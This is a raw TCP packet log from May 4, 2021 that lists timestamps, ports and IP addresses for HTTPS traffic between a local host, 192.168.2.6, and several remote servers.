May 4, 2021 12:35:12.890661955 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:12.890696049 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:12.890716076 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:12.890780926 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:12.987467051 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.987503052 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.987626076 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.987664938 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.987818003 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.987837076 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.987859011 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.987871885 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.987916946 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.987931013 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.987963915 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.988686085 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.989216089 CEST	49740	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.989677906 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.989712954 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.989737034 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:12.989774942 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:12.989814997 CEST	49741	443	192.168.2.6	34.202.206.65
May 4, 2021 12:35:13.014827967 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.053366899 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.124806881 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:13.152079105 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.166464090 CEST	443	49740	34.202.206.65	192.168.2.6
May 4, 2021 12:35:13.167376041 CEST	443	49741	34.202.206.65	192.168.2.6
May 4, 2021 12:35:13.170490980 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:13.170532942 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:13.170556068 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:13.170665979 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:13.170711040 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:13.199486971 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:13.238379002 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.242364883 CEST	443	49730	13.224.193.90	192.168.2.6
May 4, 2021 12:35:13.242460966 CEST	49730	443	192.168.2.6	13.224.193.90
May 4, 2021 12:35:13.333467960 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:13.337773085 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.351636887 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.377214909 CEST	443	49732	143.204.98.25	192.168.2.6
May 4, 2021 12:35:13.377392054 CEST	49732	443	192.168.2.6	143.204.98.25
May 4, 2021 12:35:13.548576117 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548618078 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548641920 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548665047 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548688889 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548711061 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548734903 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548757076 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548779011 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548803091 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.548819065 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.548872948 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.735405922 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735446930 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735471010 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735493898 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735516071 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735544920 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735554934 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.735582113 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735594034 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.735614061 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735637903 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735658884 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735670090 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.735692024 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735707045 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.735723972 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735747099 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735771894 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735780001 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.735800028 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735820055 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735829115 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.735850096 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735877037 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735883951 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.735909939 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735924006 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.735945940 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.735990047 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.920897961 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.920975924 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921036005 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921086073 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.921170950 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921251059 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921267033 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.921328068 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921380997 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.921447992 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921492100 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921539068 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.921572924 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921624899 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921674013 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.921704054 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921753883 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921807051 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921818972 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.921880960 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.921935081 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.921973944 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922024012 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922074080 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.922099113 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922154903 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922214985 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922231913 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.922290087 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922344923 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.922391891 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922450066 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922497034 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.922545910 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922605038 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922660112 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.922688007 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922743082 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922791958 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.922816038 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922878981 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.922929049 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.922974110 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923031092 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923084021 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.923105955 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923151970 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923191071 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923214912 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.923274040 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923341036 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923360109 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.923427105 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923479080 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.923544884 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923607111 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923657894 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:13.923691988 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923753023 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:13.923805952 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.110264063 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110331059 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110404015 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110455990 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110505104 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110537052 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.110591888 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110631943 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.110671997 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110726118 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110769033 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.110800982 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110842943 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110898018 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110945940 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.110965967 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.111023903 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111038923 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.111099005 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111152887 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111205101 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111227036 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.111282110 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111304998 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.111354113 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111398935 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111449003 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.111465931 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111522913 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111551046 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.111598969 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111640930 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111709118 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111722946 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.111782074 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111809015 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.111860037 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111906052 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.111943960 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.111984968 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112024069 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112054110 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112093925 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112135887 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.112168074 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112215042 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112258911 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112291098 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.112320900 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112358093 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.112389088 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112441063 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112493038 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112534046 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.112567902 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112631083 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.112656116 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112714052 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112756014 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112770081 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.112822056 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112843037 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.112891912 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112941980 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.112987041 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.113008976 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.113055944 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.113092899 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.113133907 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.113218069 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.298197031 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298238039 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298264980 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298290968 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298316956 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298336029 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.298386097 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.298451900 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298494101 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298527002 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.298551083 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298584938 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298625946 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298636913 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.298672915 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.298687935 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298723936 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298759937 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298793077 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298810005 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.298846960 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.298871994 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298907995 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298943043 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.298958063 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.298995018 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299029112 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299045086 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.299078941 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299113989 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299129009 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.299165010 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299199104 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299217939 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.299273014 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299324036 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.299354076 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299412966 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299465895 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.299488068 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299540997 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299578905 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299595118 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.299631119 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299665928 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299681902 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.299719095 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299752951 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299767971 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.299817085 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299855947 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299871922 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.299909115 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299942017 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.299957991 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.300002098 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300040007 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300055027 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.300091982 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300124884 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300142050 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.300185919 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300229073 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300246000 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.300285101 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300322056 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300338030 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.300374031 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300417900 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300441027 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.300472021 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.300522089 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485349894 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485394001 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485423088 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485445976 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485470057 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485482931 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485495090 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485521078 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485543966 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485567093 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485589027 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485601902 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485621929 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485634089 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485656023 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485680103 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485690117 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485713005 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485738993 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485745907 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485766888 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485794067 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485801935 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485826015 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485851049 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485861063 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485886097 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485898972 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485922098 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485945940 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.485965967 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.485979080 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486000061 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486021042 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486032009 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486056089 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486072063 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486089945 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486113071 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486135006 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486148119 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486175060 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486188889 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486213923 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486238956 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486254930 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486273050 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486295938 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486311913 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486327887 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486351967 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486368895 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486385107 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486408949 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486426115 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486443996 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486466885 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486489058 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486500025 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486524105 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486538887 CEST	49734	443	192.168.2.6	50.87.249.219
May 4, 2021 12:35:14.486558914 CEST	443	49734	50.87.249.219	192.168.2.6
May 4, 2021 12:35:14.486581087 CEST	443	49734	50.87.249.219	192.168.2.6
